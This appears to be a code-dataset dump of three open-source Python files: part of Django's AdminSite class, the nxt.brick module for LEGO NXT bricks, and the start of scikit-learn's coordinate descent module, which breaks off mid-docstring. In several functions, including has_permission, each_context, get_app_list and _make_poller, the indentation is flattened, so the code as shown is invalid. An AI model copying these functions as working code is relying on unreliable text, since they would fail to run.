                    'cannot be registered with admin.' % model.__name__)
            if model in self._registry:
                raise AlreadyRegistered('The model %s is already registered' % model.__name__)
            # Ignore the registration if the model has been
            # swapped out.
            if not model._meta.swapped:
                # If we got **options then dynamically construct a subclass of
                # admin_class with those **options.
                if options:
                    # For reasons I don't quite understand, without a __module__
                    # the created class appears to "live" in the wrong place,
                    # which causes issues later on.
                    options['__module__'] = __name__
                    admin_class = type("%sAdmin" % model.__name__, (admin_class,), options)
                # Instantiate the admin class to save in the registry
                admin_obj = admin_class(model, self)
                # Run checks for custom ModelAdmins eagerly in DEBUG and
                # collect any errors for the system check framework.
                if admin_class is not ModelAdmin and settings.DEBUG:
                    system_check_errors.extend(admin_obj.check())
                self._registry[model] = admin_obj
    def unregister(self, model_or_iterable):
        """
        Unregisters the given model(s).
        If a model isn't already registered, this will raise NotRegistered.
        """
        # Accept a single model class as well as an iterable of them.
        if isinstance(model_or_iterable, ModelBase):
            model_or_iterable = [model_or_iterable]
        for model in model_or_iterable:
            if model not in self._registry:
                raise NotRegistered('The model %s is not registered' % model.__name__)
            del self._registry[model]
    def is_registered(self, model):
        """
        Check if a model class is registered with this `AdminSite`.

        Returns True or False.
        """
        return model in self._registry
    def add_action(self, action, name=None):
        """
        Register an action to be available globally.
        """
        # Default the action name to the callable's function name.
        name = name or action.__name__
        self._actions[name] = action
        self._global_actions[name] = action
    def disable_action(self, name):
        """
        Disable a globally-registered action. Raises KeyError for invalid names.
        """
        # Only removed from the enabled set; get_action() can still find it
        # through _global_actions.
        del self._actions[name]
    def get_action(self, name):
        """
        Explicitly get a registered global action whether it's enabled or
        not. Raises KeyError for invalid names.
        """
        # Looked up in _global_actions so disabled actions remain retrievable.
        return self._global_actions[name]
    @property
    def actions(self):
        """
        Get all the enabled actions as an iterable of (name, func).

        Actions removed via disable_action() are not included.
        """
        return six.iteritems(self._actions)
    @property
    def empty_value_display(self):
        # Placeholder string displayed for empty field values.
        return self._empty_value_display
    @empty_value_display.setter
    def empty_value_display(self, empty_value_display):
        self._empty_value_display = empty_value_display
def has_permission(self, request):
"""
Returns True if the given HttpRequest has permission to view
*at least one* page in the admin site.
"""
return request.user.is_active and request.user.is_staff
    def check_dependencies(self):
        """
        Check that all things needed to run the admin have been correctly installed.
        The default implementation checks that admin and contenttypes apps are
        installed, as well as the auth context processor.

        Raises ImproperlyConfigured on the first missing dependency.
        """
        if not apps.is_installed('django.contrib.admin'):
            raise ImproperlyConfigured(
                "Put 'django.contrib.admin' in your INSTALLED_APPS "
                "setting in order to use the admin application.")
        if not apps.is_installed('django.contrib.contenttypes'):
            raise ImproperlyConfigured(
                "Put 'django.contrib.contenttypes' in your INSTALLED_APPS "
                "setting in order to use the admin application.")
        try:
            default_template_engine = Engine.get_default()
        except Exception:
            # Skip this non-critical check:
            # 1. if the user has a non-trivial TEMPLATES setting and Django
            #    can't find a default template engine
            # 2. if anything goes wrong while loading template engines, in
            #    order to avoid raising an exception from a confusing location
            # Catching ImproperlyConfigured suffices for 1. but 2. requires
            # catching all exceptions.
            pass
        else:
            # Only reached when a default engine loaded cleanly.
            if ('django.contrib.auth.context_processors.auth'
                    not in default_template_engine.context_processors):
                raise ImproperlyConfigured(
                    "Enable 'django.contrib.auth.context_processors.auth' "
                    "in your TEMPLATES setting in order to use the admin "
                    "application.")
    def admin_view(self, view, cacheable=False):
        """
        Decorator to create an admin view attached to this ``AdminSite``. This
        wraps the view and provides permission checking by calling
        ``self.has_permission``.
        You'll want to use this from within ``AdminSite.get_urls()``:
            class MyAdminSite(AdminSite):
                def get_urls(self):
                    from django.conf.urls import url
                    urls = super(MyAdminSite, self).get_urls()
                    urls += [
                        url(r'^my_view/$', self.admin_view(some_view))
                    ]
                    return urls
        By default, admin_views are marked non-cacheable using the
        ``never_cache`` decorator. If the view can be safely cached, set
        cacheable=True.
        """
        def inner(request, *args, **kwargs):
            if not self.has_permission(request):
                if request.path == reverse('admin:logout', current_app=self.name):
                    # An anonymous hit on the logout URL is sent straight
                    # to the index instead of through redirect_to_login.
                    index_path = reverse('admin:index', current_app=self.name)
                    return HttpResponseRedirect(index_path)
                # Inner import to prevent django.contrib.admin (app) from
                # importing django.contrib.auth.models.User (unrelated model).
                from django.contrib.auth.views import redirect_to_login
                return redirect_to_login(
                    request.get_full_path(),
                    reverse('admin:login', current_app=self.name)
                )
            return view(request, *args, **kwargs)
        if not cacheable:
            # Mark responses non-cacheable unless the caller opted in.
            inner = never_cache(inner)
        # We add csrf_protect here so this function can be used as a utility
        # function for any view, without having to repeat 'csrf_protect'.
        if not getattr(view, 'csrf_exempt', False):
            inner = csrf_protect(inner)
        return update_wrapper(inner, view)
    def get_urls(self):
        """
        Build the full urlpattern list for this admin site: the site-wide
        views, one URL sub-tree per registered ModelAdmin, and a per-app
        index restricted to apps that actually have registered models.
        """
        from django.conf.urls import url, include
        # Since this module gets imported in the application's root package,
        # it cannot import models from other applications at the module level,
        # and django.contrib.contenttypes.views imports ContentType.
        from django.contrib.contenttypes import views as contenttype_views
        if settings.DEBUG:
            self.check_dependencies()
        def wrap(view, cacheable=False):
            # Route the view through admin_view() (permission checking) and
            # tag the wrapper with the owning site for introspection.
            def wrapper(*args, **kwargs):
                return self.admin_view(view, cacheable)(*args, **kwargs)
            wrapper.admin_site = self
            return update_wrapper(wrapper, view)
        # Admin-site-wide views.
        urlpatterns = [
            url(r'^$', wrap(self.index), name='index'),
            url(r'^login/$', self.login, name='login'),
            url(r'^logout/$', wrap(self.logout), name='logout'),
            url(r'^password_change/$', wrap(self.password_change, cacheable=True), name='password_change'),
            url(r'^password_change/done/$', wrap(self.password_change_done, cacheable=True),
                name='password_change_done'),
            url(r'^jsi18n/$', wrap(self.i18n_javascript, cacheable=True), name='jsi18n'),
            url(r'^r/(?P<content_type_id>\d+)/(?P<object_id>.+)/$', wrap(contenttype_views.shortcut),
                name='view_on_site'),
        ]
        # Add in each model's views, and create a list of valid URLS for the
        # app_index
        valid_app_labels = []
        for model, model_admin in self._registry.items():
            urlpatterns += [
                url(r'^%s/%s/' % (model._meta.app_label, model._meta.model_name), include(model_admin.urls)),
            ]
            if model._meta.app_label not in valid_app_labels:
                valid_app_labels.append(model._meta.app_label)
        # If there were ModelAdmins registered, we should have a list of app
        # labels for which we need to allow access to the app_index view,
        if valid_app_labels:
            regex = r'^(?P<app_label>' + '|'.join(valid_app_labels) + ')/$'
            urlpatterns += [
                url(regex, wrap(self.app_index), name='app_list'),
            ]
        return urlpatterns
    @property
    def urls(self):
        # (urlpatterns, application namespace, instance namespace); the
        # instance namespace is this site's name.
        return self.get_urls(), 'admin', self.name
def each_context(self, request):
"""
Returns a dictionary of variables to put in the template context for
*every* page in the admin site.
"""
return {
'site_title': self.site_title,
'site_header': self.site_header,
'site_url': self.site_url,
'has_permission': self.has_permission(request),
'available_apps': self.get_app_list(request),
}
    def password_change(self, request, extra_context=None):
        """
        Handles the "change password" task -- both form display and validation.

        Delegates to django.contrib.auth.views.password_change with
        admin-specific defaults (admin form, redirect target, context).
        """
        from django.contrib.admin.forms import AdminPasswordChangeForm
        from django.contrib.auth.views import password_change
        url = reverse('admin:password_change_done', current_app=self.name)
        defaults = {
            'password_change_form': AdminPasswordChangeForm,
            'post_change_redirect': url,
            'extra_context': dict(self.each_context(request), **(extra_context or {})),
        }
        if self.password_change_template is not None:
            # Per-site template override.
            defaults['template_name'] = self.password_change_template
        request.current_app = self.name
        return password_change(request, **defaults)
    def password_change_done(self, request, extra_context=None):
        """
        Displays the "success" page after a password change.

        Thin wrapper over django.contrib.auth.views.password_change_done.
        """
        from django.contrib.auth.views import password_change_done
        defaults = {
            'extra_context': dict(self.each_context(request), **(extra_context or {})),
        }
        if self.password_change_done_template is not None:
            # Per-site template override.
            defaults['template_name'] = self.password_change_done_template
        request.current_app = self.name
        return password_change_done(request, **defaults)
def i18n_javascript(self, request):
"""
Displays the i18n JavaScript that the Django admin requires.
This takes into account the USE_I18N setting. If it's set to False, the
generated JavaScript will be leaner and faster.
"""
if settings.USE_I18N:
from django.views.i18n import javascript_catalog
else:
from django.views.i18n import null_javascript_catalog as javascript_catalog
return javascript_catalog(request, packages=['django.conf', 'django.contrib.admin'])
    @never_cache
    def logout(self, request, extra_context=None):
        """
        Logs out the user for the given HttpRequest.
        This should *not* assume the user is already logged in.

        Delegates to django.contrib.auth.views.logout.
        """
        from django.contrib.auth.views import logout
        defaults = {
            'extra_context': dict(self.each_context(request), **(extra_context or {})),
        }
        if self.logout_template is not None:
            # Per-site template override.
            defaults['template_name'] = self.logout_template
        request.current_app = self.name
        return logout(request, **defaults)
    @never_cache
    def login(self, request, extra_context=None):
        """
        Displays the login form for the given HttpRequest.

        A GET from an already-authorised user short-circuits to the index.
        """
        if request.method == 'GET' and self.has_permission(request):
            # Already logged-in, redirect to admin index
            index_path = reverse('admin:index', current_app=self.name)
            return HttpResponseRedirect(index_path)
        from django.contrib.auth.views import login
        # Since this module gets imported in the application's root package,
        # it cannot import models from other applications at the module level,
        # and django.contrib.admin.forms eventually imports User.
        from django.contrib.admin.forms import AdminAuthenticationForm
        context = dict(self.each_context(request),
            title=_('Log in'),
            app_path=request.get_full_path(),
        )
        if (REDIRECT_FIELD_NAME not in request.GET and
                REDIRECT_FIELD_NAME not in request.POST):
            # No explicit "next" target supplied: successful logins go to
            # the admin index.
            context[REDIRECT_FIELD_NAME] = reverse('admin:index', current_app=self.name)
        context.update(extra_context or {})
        defaults = {
            'extra_context': context,
            'authentication_form': self.login_form or AdminAuthenticationForm,
            'template_name': self.login_template or 'admin/login.html',
        }
        request.current_app = self.name
        return login(request, **defaults)
    def _build_app_dict(self, request, label=None):
        """
        Builds the app dictionary. Takes an optional label parameters to filter
        models of a specific app.

        Returns {app_label: app_entry} covering every registered model the
        user may see; with *label* given, returns just that app's entry (or
        None when nothing matches) and raises PermissionDenied if the user
        lacks module permission for it.
        """
        app_dict = {}
        if label:
            models = {
                m: m_a for m, m_a in self._registry.items()
                if m._meta.app_label == label
            }
        else:
            models = self._registry
        for model, model_admin in models.items():
            app_label = model._meta.app_label
            has_module_perms = model_admin.has_module_permission(request)
            if not has_module_perms:
                if label:
                    raise PermissionDenied
                continue
            perms = model_admin.get_model_perms(request)
            # Check whether user has any perm for this module.
            # If so, add the module to the model_list.
            if True not in perms.values():
                continue
            info = (app_label, model._meta.model_name)
            model_dict = {
                'name': capfirst(model._meta.verbose_name_plural),
                'object_name': model._meta.object_name,
                'perms': perms,
            }
            # Admin URLs are attached only for permissions the user holds,
            # and only when the pattern can actually be reversed.
            if perms.get('change'):
                try:
                    model_dict['admin_url'] = reverse('admin:%s_%s_changelist' % info, current_app=self.name)
                except NoReverseMatch:
                    pass
            if perms.get('add'):
                try:
                    model_dict['add_url'] = reverse('admin:%s_%s_add' % info, current_app=self.name)
                except NoReverseMatch:
                    pass
            if app_label in app_dict:
                app_dict[app_label]['models'].append(model_dict)
            else:
                app_dict[app_label] = {
                    'name': apps.get_app_config(app_label).verbose_name,
                    'app_label': app_label,
                    'app_url': reverse(
                        'admin:app_list',
                        kwargs={'app_label': app_label},
                        current_app=self.name,
                    ),
                    'has_module_perms': has_module_perms,
                    'models': [model_dict],
                }
        if label:
            return app_dict.get(label)
        return app_dict
def get_app_list(self, request):
"""
Returns a sorted list of all the installed apps that have been
registered in this site.
"""
app_dict = self._build_app_dict(request)
# Sort the apps alphabetically.
app_list = sorted(app_dict.values(), key=lambda x: x['name'].lower())
# Sort the models alphabetically within each app.
for app in app_list:
app['models'].sort(key=lambda x: x['name'])
return app_list
    @never_cache
    def index(self, request, extra_context=None):
        """
        Displays the main admin index page, which lists all of the installed
        apps that have been registered in this site.
        """
        app_list = self.get_app_list(request)
        context = dict(
            self.each_context(request),
            title=self.index_title,
            app_list=app_list,
        )
        context.update(extra_context or {})
        request.current_app = self.name
        # Per-site template override, falling back to the stock template.
        return TemplateResponse(request, self.index_template or
                                'admin/index.html', context)
    def app_index(self, request, app_label, extra_context=None):
        """
        Display the model index page for a single app.

        Raises Http404 when the app does not exist or has no models the
        user may see (i.e. _build_app_dict returned nothing for it).
        """
        app_dict = self._build_app_dict(request, app_label)
        if not app_dict:
            raise Http404('The requested admin page does not exist.')
        # Sort the models alphabetically within each app.
        app_dict['models'].sort(key=lambda x: x['name'])
        app_name = apps.get_app_config(app_label).verbose_name
        context = dict(self.each_context(request),
            title=_('%(app)s administration') % {'app': app_name},
            app_list=[app_dict],
            app_label=app_label,
        )
        context.update(extra_context or {})
        request.current_app = self.name
        # App-specific template first, then the generic app index.
        return TemplateResponse(request, self.app_index_template or [
            'admin/%s/app_index.html' % app_label,
            'admin/app_index.html'
        ], context)
# This global object represents the default admin site, for the common case.
# You can instantiate AdminSite in your own code to create a custom admin
# site with its own independent registry.
site = AdminSite()
| bsd-3-clause |
Bobeye/LinkMechanismStewartGouph | OFWTP/nxt/brick.py | 21 | 6947 | # nxt.brick module -- Classes to represent LEGO Mindstorms NXT bricks
# Copyright (C) 2006 Douglas P Lau
# Copyright (C) 2009 Marcus Wanner, rhn
# Copyright (C) 2010 rhn, Marcus Wanner, zonedabone
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
from time import sleep
from threading import Lock
from nxt.error import FileNotFound, ModuleNotFound
from nxt.telegram import OPCODES, Telegram
from nxt.sensor import get_sensor
from nxt.motcont import MotCont
def _make_poller(opcode, poll_func, parse_func):
def poll(self, *args, **kwargs):
ogram = poll_func(opcode, *args, **kwargs)
with self.lock:
self.sock.send(str(ogram))
if ogram.reply:
igram = Telegram(opcode=opcode, pkt=self.sock.recv())
if ogram.reply:
return parse_func(igram)
else:
return None
return poll
class _Meta(type):
    """Metaclass which adds one poller method per telegram opcode.

    Each entry of nxt.telegram.OPCODES maps an opcode to
    (poll_func, parse_func[, docstring]); a wrapper built with
    _make_poller() is attached to the class under the poll function's name.
    """
    def __init__(cls, name, bases, namespace):
        # Renamed the third parameter from ``dict`` to avoid shadowing the
        # builtin; ``type`` passes it positionally, so callers are unaffected.
        super(_Meta, cls).__init__(name, bases, namespace)
        for opcode in OPCODES:
            poll_func, parse_func = OPCODES[opcode][0:2]
            m = _make_poller(opcode, poll_func, parse_func)
            try:
                # The optional third tuple entry is the generated method's
                # docstring.
                m.__doc__ = OPCODES[opcode][2]
            except IndexError:
                # Was a bare ``except:``; only a missing doc entry can raise
                # here, so catch just IndexError.
                pass
            setattr(cls, poll_func.__name__, m)
class FileFinder(object):
    """A generator to find files on a NXT brick.

    Iterating yields one (filename, size) tuple per brick file whose name
    matches *pattern*.
    """
    def __init__(self, brick, pattern):
        self.brick = brick
        self.pattern = pattern
        self.handle = None  # brick-side search handle, open during a scan
    def _close(self):
        # Release the brick-side handle exactly once.
        if self.handle is not None:
            self.brick.close(self.handle)
            self.handle = None
    def __del__(self):
        self._close()
    def __iter__(self):
        # The entire listing is collected eagerly so the brick-side handle
        # is closed before the first result is yielded to the caller.
        results = []
        self.handle, fname, size = self.brick.find_first(self.pattern)
        results.append((fname, size))
        while True:
            try:
                handle, fname, size = self.brick.find_next(self.handle)
                results.append((fname, size))
            except FileNotFound:
                # nxt.error.FileNotFound signals end-of-listing.
                self._close()
                break
        for result in results:
            yield result
def File(brick, name, mode='r', size=None):
    """Open a file on the brick for reading or writing.

    *mode* is 'r' (returns a FileReader) or 'w' (returns a FileWriter);
    in write mode the total file *size* in bytes must be given up front.

    Raises ValueError for an unsupported mode or a missing size.
    """
    if mode == 'w':
        if size is None:
            # Bug fix: the original *returned* the ValueError instances in
            # this function instead of raising them.
            raise ValueError('Size not specified')
        return FileWriter(brick, name, size)
    elif mode == 'r':
        return FileReader(brick, name)
    else:
        raise ValueError('Mode ' + str(mode) + ' not supported')
class FileReader(object):
    """Context manager to read a file on a NXT brick. Do use the iterator or
    the read() method, but not both at the same time!
    The iterator returns strings of an arbitrary (short) length.
    """
    def __init__(self, brick, fname):
        self.brick = brick
        # open_read returns the brick-side handle plus the file's size.
        self.handle, self.size = brick.open_read(fname)
    def read(self, bytes=None):
        """Read *bytes* bytes (the whole file when omitted) as one string."""
        if bytes is not None:
            remaining = bytes
        else:
            remaining = self.size
        bsize = self.brick.sock.bsize
        data = []
        while remaining > 0:
            # Each request is capped by the socket buffer size; ``remaining``
            # is decremented by the number of bytes actually returned.
            handle, bsize, buffer_ = self.brick.read(self.handle,
                min(bsize, remaining))
            remaining -= len(buffer_)
            data.append(buffer_)
        return ''.join(data)
    def close(self):
        """Release the brick-side handle; safe to call more than once."""
        if self.handle is not None:
            self.brick.close(self.handle)
            self.handle = None
    def __del__(self):
        self.close()
    def __enter__(self):
        return self
    def __exit__(self, etp, value, tb):
        self.close()
    def __iter__(self):
        # Stream the file chunk by chunk rather than joining like read().
        rem = self.size
        bsize = self.brick.sock.bsize
        while rem > 0:
            handle, bsize, data = self.brick.read(self.handle,
                min(bsize, rem))
            yield data
            rem -= len(data)
class FileWriter(object):
    """Write-only handle for a file being created on a NXT brick.

    The total file size must be declared at construction time; write()
    refuses data that would overflow it.
    """
    def __init__(self, brick, fname, size):
        self.brick = brick
        self.handle = self.brick.open_write(fname, size)
        self._position = 0
        self.size = size
    def __del__(self):
        self.close()
    def close(self):
        """Release the brick-side handle; safe to call more than once."""
        if self.handle is not None:
            self.brick.close(self.handle)
            self.handle = None
    def tell(self):
        """Return the number of bytes written so far."""
        return self._position
    def write(self, data):
        """Send *data* to the brick in socket-buffer-sized batches.

        Raises ValueError when the data would exceed the declared size.
        """
        total = len(data)
        if total > self.size - self._position:
            raise ValueError('Data will not fit into remaining space')
        batch_limit = self.brick.sock.bsize
        sent = 0
        while sent < total:
            step = min(batch_limit, total - sent)
            chunk = data[sent:sent + step]
            handle, size = self.brick.write(self.handle, chunk)
            sent += step
            self._position += step
class ModuleFinder(object):
    """Iterator to look up modules on a NXT brick.

    Iterating yields one (name, id, size, iomap_size) tuple per module
    matching *pattern*.
    """
    def __init__(self, brick, pattern):
        self.brick = brick
        self.pattern = pattern
        self.handle = None  # brick-side search handle
    def _close(self):
        if self.handle:
            self.brick.close(self.handle)
            self.handle = None
    def __del__(self):
        self._close()
    def __iter__(self):
        # Unlike FileFinder, results are yielded lazily: the handle stays
        # open until the listing is exhausted (or the finder is deleted).
        self.handle, mname, mid, msize, miomap_size = \
            self.brick.request_first_module(self.pattern)
        yield (mname, mid, msize, miomap_size)
        while True:
            try:
                handle, mname, mid, msize, miomap_size = \
                    self.brick.request_next_module(
                    self.handle)
                yield (mname, mid, msize, miomap_size)
            except ModuleNotFound:
                # nxt.error.ModuleNotFound signals end-of-listing.
                self._close()
                break
class Brick(object): #TODO: this begs to have explicit methods
    """Main object for NXT control.

    Most protocol methods are not written out here: the _Meta metaclass
    generates one method per entry of nxt.telegram.OPCODES (play_tone,
    open_write, find_first, ... as referenced by the helpers above).
    """
    __metaclass__ = _Meta  # Python 2 style metaclass hook
    def __init__(self, sock):
        self.sock = sock
        # Serialises telegram send/recv pairs across threads (see
        # _make_poller).
        self.lock = Lock()
        self.mc = MotCont(self)
    def play_tone_and_wait(self, frequency, duration):
        """Play a tone and block until its *duration* (in ms) has elapsed."""
        self.play_tone(frequency, duration)
        sleep(duration / 1000.0)
    def __del__(self):
        self.sock.close()
    # Convenience aliases. NOTE(review): get_sensor and File are functions
    # and therefore bind ``self`` when accessed through an instance, but
    # FileFinder/ModuleFinder are classes and do NOT bind -- verify callers
    # pass the brick explicitly for find_files/find_modules.
    find_files = FileFinder
    find_modules = ModuleFinder
    open_file = File
    get_sensor = get_sensor
| gpl-3.0 |
AlexRobson/scikit-learn | sklearn/linear_model/coordinate_descent.py | 37 | 74167 | # Author: Alexandre Gramfort <alexandre.gramfort@inria.fr>
# Fabian Pedregosa <fabian.pedregosa@inria.fr>
# Olivier Grisel <olivier.grisel@ensta.org>
# Gael Varoquaux <gael.varoquaux@inria.fr>
#
# License: BSD 3 clause
import sys
import warnings
from abc import ABCMeta, abstractmethod
import numpy as np
from scipy import sparse
from .base import LinearModel, _pre_fit
from ..base import RegressorMixin
from .base import center_data, sparse_center_data
from ..utils import check_array, check_X_y, deprecated
from ..utils.validation import check_random_state
from ..cross_validation import check_cv
from ..externals.joblib import Parallel, delayed
from ..externals import six
from ..externals.six.moves import xrange
from ..utils.extmath import safe_sparse_dot
from ..utils.validation import check_is_fitted
from ..utils.validation import column_or_1d
from ..utils import ConvergenceWarning
from . import cd_fast
###############################################################################
# Paths functions
def _alpha_grid(X, y, Xy=None, l1_ratio=1.0, fit_intercept=True,
                eps=1e-3, n_alphas=100, normalize=False, copy_X=True):
    """ Compute the grid of alpha values for elastic net parameter search
    Parameters
    ----------
    X : {array-like, sparse matrix}, shape (n_samples, n_features)
        Training data. Pass directly as Fortran-contiguous data to avoid
        unnecessary memory duplication
    y : ndarray, shape (n_samples,)
        Target values
    Xy : array-like, optional
        Xy = np.dot(X.T, y) that can be precomputed.
    l1_ratio : float
        The elastic net mixing parameter, with ``0 <= l1_ratio <= 1``.
        For ``l1_ratio = 0`` the penalty is an L2 penalty. ``For
        l1_ratio = 1`` it is an L1 penalty.  For ``0 < l1_ratio <
        1``, the penalty is a combination of L1 and L2.
    eps : float, optional
        Length of the path. ``eps=1e-3`` means that
        ``alpha_min / alpha_max = 1e-3``
    n_alphas : int, optional
        Number of alphas along the regularization path
    fit_intercept : boolean, default True
        Whether to fit an intercept or not
    normalize : boolean, optional, default False
        If ``True``, the regressors X will be normalized before regression.
    copy_X : boolean, optional, default True
        If ``True``, X will be copied; else, it may be overwritten.

    Returns
    -------
    alphas : ndarray, shape (n_alphas,)
        Log-spaced grid in decreasing order, from alpha_max down to
        alpha_max * eps.
    """
    n_samples = len(y)
    sparse_center = False
    if Xy is None:
        X_sparse = sparse.isspmatrix(X)
        sparse_center = X_sparse and (fit_intercept or normalize)
        X = check_array(X, 'csc',
                        copy=(copy_X and fit_intercept and not X_sparse))
        if not X_sparse:
            # X can be touched inplace thanks to the above line
            X, y, _, _, _ = center_data(X, y, fit_intercept,
                                        normalize, copy=False)
        Xy = safe_sparse_dot(X.T, y, dense_output=True)
        if sparse_center:
            # Workaround to find alpha_max for sparse matrices.
            # since we should not destroy the sparsity of such matrices.
            _, _, X_mean, _, X_std = sparse_center_data(X, y, fit_intercept,
                                                        normalize)
            mean_dot = X_mean * np.sum(y)
    if Xy.ndim == 1:
        Xy = Xy[:, np.newaxis]
    if sparse_center:
        # Apply the centering/normalization to X^T y without densifying X.
        if fit_intercept:
            Xy -= mean_dot[:, np.newaxis]
        if normalize:
            Xy /= X_std[:, np.newaxis]
    # alpha_max: largest row norm of X^T y scaled by n_samples * l1_ratio --
    # the smallest alpha expected to drive all coefficients to zero.
    alpha_max = (np.sqrt(np.sum(Xy ** 2, axis=1)).max() /
                 (n_samples * l1_ratio))
    if alpha_max <= np.finfo(float).resolution:
        # Degenerate case (X^T y numerically zero): return a flat grid at
        # machine resolution instead of a log-space over zero.
        alphas = np.empty(n_alphas)
        alphas.fill(np.finfo(float).resolution)
        return alphas
    return np.logspace(np.log10(alpha_max * eps), np.log10(alpha_max),
                       num=n_alphas)[::-1]
def lasso_path(X, y, eps=1e-3, n_alphas=100, alphas=None,
               precompute='auto', Xy=None, copy_X=True, coef_init=None,
               verbose=False, return_n_iter=False, positive=False, **params):
    """Compute Lasso path with coordinate descent

    The Lasso optimization function varies for mono and multi-outputs.
    For mono-output tasks it is::
        (1 / (2 * n_samples)) * ||y - Xw||^2_2 + alpha * ||w||_1
    For multi-output tasks it is::
        (1 / (2 * n_samples)) * ||Y - XW||^2_Fro + alpha * ||W||_21
    Where::
        ||W||_21 = \sum_i \sqrt{\sum_j w_{ij}^2}
    i.e. the sum of norm of each row.
    Read more in the :ref:`User Guide <lasso>`.

    Parameters
    ----------
    X : {array-like, sparse matrix}, shape (n_samples, n_features)
        Training data. Pass directly as Fortran-contiguous data to avoid
        unnecessary memory duplication. If ``y`` is mono-output then ``X``
        can be sparse.
    y : ndarray, shape (n_samples,), or (n_samples, n_outputs)
        Target values
    eps : float, optional
        Length of the path. ``eps=1e-3`` means that
        ``alpha_min / alpha_max = 1e-3``
    n_alphas : int, optional
        Number of alphas along the regularization path
    alphas : ndarray, optional
        List of alphas where to compute the models.
        If ``None`` alphas are set automatically
    precompute : True | False | 'auto' | array-like
        Whether to use a precomputed Gram matrix to speed up
        calculations. If set to ``'auto'`` let us decide. The Gram
        matrix can also be passed as argument.
    Xy : array-like, optional
        Xy = np.dot(X.T, y) that can be precomputed. It is useful
        only when the Gram matrix is precomputed.
    copy_X : boolean, optional, default True
        If ``True``, X will be copied; else, it may be overwritten.
    coef_init : array, shape (n_features, ) | None
        The initial values of the coefficients.
    verbose : bool or integer
        Amount of verbosity.
    params : kwargs
        keyword arguments passed to the coordinate descent solver.
    positive : bool, default False
        If set to True, forces coefficients to be positive.
    return_n_iter : bool
        whether to return the number of iterations or not.

    Returns
    -------
    alphas : array, shape (n_alphas,)
        The alphas along the path where models are computed.
    coefs : array, shape (n_features, n_alphas) or \
            (n_outputs, n_features, n_alphas)
        Coefficients along the path.
    dual_gaps : array, shape (n_alphas,)
        The dual gaps at the end of the optimization for each alpha.
    n_iters : array-like, shape (n_alphas,)
        The number of iterations taken by the coordinate descent optimizer to
        reach the specified tolerance for each alpha.

    Notes
    -----
    See examples/linear_model/plot_lasso_coordinate_descent_path.py
    for an example.
    To avoid unnecessary memory duplication the X argument of the fit method
    should be directly passed as a Fortran-contiguous numpy array.
    Note that in certain cases, the Lars solver may be significantly
    faster to implement this functionality. In particular, linear
    interpolation can be used to retrieve model coefficients between the
    values output by lars_path

    Examples
    ---------
    Comparing lasso_path and lars_path with interpolation:
    >>> X = np.array([[1, 2, 3.1], [2.3, 5.4, 4.3]]).T
    >>> y = np.array([1, 2, 3.1])
    >>> # Use lasso_path to compute a coefficient path
    >>> _, coef_path, _ = lasso_path(X, y, alphas=[5., 1., .5])
    >>> print(coef_path)
    [[ 0.          0.          0.46874778]
     [ 0.2159048   0.4425765   0.23689075]]
    >>> # Now use lars_path and 1D linear interpolation to compute the
    >>> # same path
    >>> from sklearn.linear_model import lars_path
    >>> alphas, active, coef_path_lars = lars_path(X, y, method='lasso')
    >>> from scipy import interpolate
    >>> coef_path_continuous = interpolate.interp1d(alphas[::-1],
    ...                                             coef_path_lars[:, ::-1])
    >>> print(coef_path_continuous([5., 1., .5]))
    [[ 0.          0.          0.46915237]
     [ 0.2159048   0.4425765   0.23668876]]

    See also
    --------
    lars_path
    Lasso
    LassoLars
    LassoCV
    LassoLarsCV
    sklearn.decomposition.sparse_encode
    """
    # A lasso is an elastic net with l1_ratio fixed at 1. Bug fix: the
    # return_n_iter argument was previously accepted and documented but
    # silently dropped; it is now forwarded to enet_path.
    return enet_path(X, y, l1_ratio=1., eps=eps, n_alphas=n_alphas,
                     alphas=alphas, precompute=precompute, Xy=Xy,
                     copy_X=copy_X, coef_init=coef_init, verbose=verbose,
                     positive=positive, return_n_iter=return_n_iter,
                     **params)
def enet_path(X, y, l1_ratio=0.5, eps=1e-3, n_alphas=100, alphas=None,
              precompute='auto', Xy=None, copy_X=True, coef_init=None,
              verbose=False, return_n_iter=False, positive=False, **params):
    """Compute elastic net path with coordinate descent

    The elastic net optimization function varies for mono and multi-outputs.
    For mono-output tasks it is::
        1 / (2 * n_samples) * ||y - Xw||^2_2 +
        + alpha * l1_ratio * ||w||_1
        + 0.5 * alpha * (1 - l1_ratio) * ||w||^2_2
    For multi-output tasks it is::
        (1 / (2 * n_samples)) * ||Y - XW||^Fro_2
        + alpha * l1_ratio * ||W||_21
        + 0.5 * alpha * (1 - l1_ratio) * ||W||_Fro^2
    Where::
        ||W||_21 = \sum_i \sqrt{\sum_j w_{ij}^2}
    i.e. the sum of norm of each row.
    Read more in the :ref:`User Guide <elastic_net>`.

    Parameters
    ----------
    X : {array-like}, shape (n_samples, n_features)
        Training data. Pass directly as Fortran-contiguous data to avoid
        unnecessary memory duplication. If ``y`` is mono-output then ``X``
        can be sparse.
    y : ndarray, shape (n_samples,) or (n_samples, n_outputs)
        Target values
    l1_ratio : float, optional
        float between 0 and 1 passed to elastic net (scaling between
        l1 and l2 penalties). ``l1_ratio=1`` corresponds to the Lasso
    eps : float
        Length of the path. ``eps=1e-3`` means that
        ``alpha_min / alpha_max = 1e-3``
    n_alphas : int, optional
        Number of alphas along the regularization path
    alphas : ndarray, optional
        List of alphas where to compute the models.
        If None alphas are set automatically
    precompute : True | False | 'auto' | array-like
        Whether to use a precomputed Gram matrix to speed up
        calculations. If set to ``'auto'`` let us decide. The Gram
        matrix can also be passed as argument.
    Xy : array-like, optional
        Xy = np.dot(X.T, y) that can be precomputed. It is useful
        only when the Gram matrix is precomputed.
    copy_X : boolean, optional, default True
        If ``True``, X will be copied; else, it may be overwritten.
    coef_init : array, shape (n_features, ) | None
        The initial values of the coefficients.
    verbose : bool or integer
        Amount of verbosity.
    params : kwargs
        keyword arguments passed to the coordinate descent solver.
    return_n_iter : bool
        whether to return the number of iterations or not.
    positive : bool, default False
        If set to True, forces coefficients to be positive.

    Returns
    -------
    alphas : array, shape (n_alphas,)
        The alphas along the path where models are computed.
    coefs : array, shape (n_features, n_alphas) or \
            (n_outputs, n_features, n_alphas)
        Coefficients along the path.
    dual_gaps : array, shape (n_alphas,)
        The dual gaps at the end of the optimization for each alpha.
    n_iters : array-like, shape (n_alphas,)
        The number of iterations taken by the coordinate descent optimizer to
